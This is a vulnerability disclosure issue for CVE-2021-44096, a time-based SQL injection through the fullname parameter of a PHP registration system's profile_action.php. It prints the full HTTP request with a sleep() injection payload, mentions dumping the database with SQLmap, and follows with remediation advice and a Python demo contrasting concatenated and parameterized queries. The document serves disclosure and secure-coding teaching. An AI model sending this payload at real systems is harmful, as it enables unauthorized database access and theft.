CVE-2021-44096: Vulnerability/BUG - SQL Injection on "profile_action - update_user" · Issue #2 · EGavilan-Media/User-Registration-and-Login-System-With-Admin-Panel
EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 is vulnerable to SQL Injection via profile_action.php (action=update_user); the proof of concept below injects through the fullname parameter. This allows a remote attacker to compromise the application's SQL database.
Hi
I found a SQL injection vulnerability in User-Registration-and-Login-System-With-Admin-Panel.
POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1
Host: 192.168.1.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Origin: http://192.168.1.3
Connection: close
Referer: http://192.168.1.3/User-Registration-and-Login-System-With-Admin-Panel-master/profile.php
Cookie: PHPSESSID=54cet827kpno5c9g9i9grjq84h
fullname=test2'%2b(select*from(select(sleep(20)))a)%2b'&username=test1&email=test%40test.com&gender=Male&action=update_user
The above query will only make the database sleep for 20 seconds, but using SQLmap a bad user can dump the database, as shown in the image.
Control -
User input consumed by the application should be validated according to its expected data type and allowed value set. For example, an age field should only be allowed to contain digits. A blacklist approach, in which certain characters and keywords are stripped from the input, is not recommended because it is easily bypassed with alternative encodings and syntax.
Remediation -
To prevent this, take the following steps:
a) Validate all input data against a whitelist of expected values or formats.
b) Use parameterized queries (prepared statements), so that user input is bound as data and is never concatenated into the SQL string. This application is written in PHP, where both mysqli and PDO provide prepared statements; the equivalent in Java looks like this:
// The '?' placeholder marks where the bound value goes; the SQL text itself never changes.
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
// The driver sends userId separately from the statement, so quotes inside it cannot alter the query.
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();
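To make the finding and the remediation concrete, the following is an added example that is not part of the original issue or of the EGavilan Media project. It reconstructs a hypothetical update_user handler in Python over an in-memory SQLite table, runs the report's own fullname payload (URL-decoded) through a string-concatenated UPDATE and then through a parameterized one, and adds a whitelist check for the gender field. The table layout, the column names, the helper names and the allowed gender values are assumptions. SQLite has no sleep() function, so where MySQL pauses for 20 seconds the concatenated query instead fails with "no such function: sleep", which equally proves that the payload reached the SQL parser; the parameterized path stores the same bytes as an ordinary string.

```python
import sqlite3
import urllib.parse

# The fullname value from the request in the report, URL-decoded
# (constructed from the PoC above; %2b decodes to '+').
PAYLOAD = urllib.parse.unquote_plus("test2'%2b(select*from(select(sleep(20)))a)%2b'")

# Assumed whitelist for the gender field (the PoC only shows "Male").
ALLOWED_GENDERS = {"Male", "Female"}


def make_db():
    """Create an in-memory users table (assumed schema) holding one row."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "fullname TEXT, email TEXT, gender TEXT)"
    )
    con.execute(
        "INSERT INTO users (username, fullname, email, gender) "
        "VALUES ('test1', 'Test One', 'test@test.com', 'Male')"
    )
    con.commit()
    return con


def update_user_vulnerable(con, username, fullname, email, gender):
    """Hypothetical reconstruction of the flawed pattern: request values are
    concatenated straight into the UPDATE, so a quote inside fullname closes
    the string literal and the rest of the value is parsed as SQL."""
    sql = (
        "UPDATE users SET fullname='" + fullname + "', email='" + email
        + "', gender='" + gender + "' WHERE username='" + username + "'"
    )
    con.execute(sql)
    con.commit()


def update_user_safe(con, username, fullname, email, gender):
    """Hardened form: whitelist validation plus a parameterized UPDATE.
    The driver sends the values separately from the SQL text, so the
    payload is stored as data and never executed."""
    if gender not in ALLOWED_GENDERS:
        raise ValueError("gender not in whitelist: %r" % gender)
    con.execute(
        "UPDATE users SET fullname=?, email=?, gender=? WHERE username=?",
        (fullname, email, gender, username),
    )
    con.commit()


def stored_fullname(con, username):
    """Read back the fullname column for one user (parameterized as well)."""
    row = con.execute(
        "SELECT fullname FROM users WHERE username=?", (username,)
    ).fetchone()
    return row[0] if row else None


def run_vulnerable():
    """Return the database error the payload provokes on the vulnerable path;
    None would mean the payload had been treated as plain data."""
    con = make_db()
    try:
        update_user_vulnerable(con, "test1", PAYLOAD, "test@test.com", "Male")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def run_safe():
    """Return what the hardened path actually stores for the same payload."""
    con = make_db()
    update_user_safe(con, "test1", PAYLOAD, "test@test.com", "Male")
    return stored_fullname(con, "test1")


def run_safe_bad_gender():
    """Return True if the whitelist rejects a gender outside the allowed set."""
    con = make_db()
    try:
        update_user_safe(con, "test1", "Test One", "test@test.com", "Unknown")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable path error:", run_vulnerable())
    print("hardened path stored:", run_safe())
    print("whitelist rejected bad gender:", run_safe_bad_gender())
```

Running the script shows the two outcomes side by side: the concatenated query hands the payload to the SQL engine (an error here, a 20-second delay on the MySQL backend the report targets), while the parameterized query stores the string verbatim and the whitelist refuses an unexpected gender before any query runs.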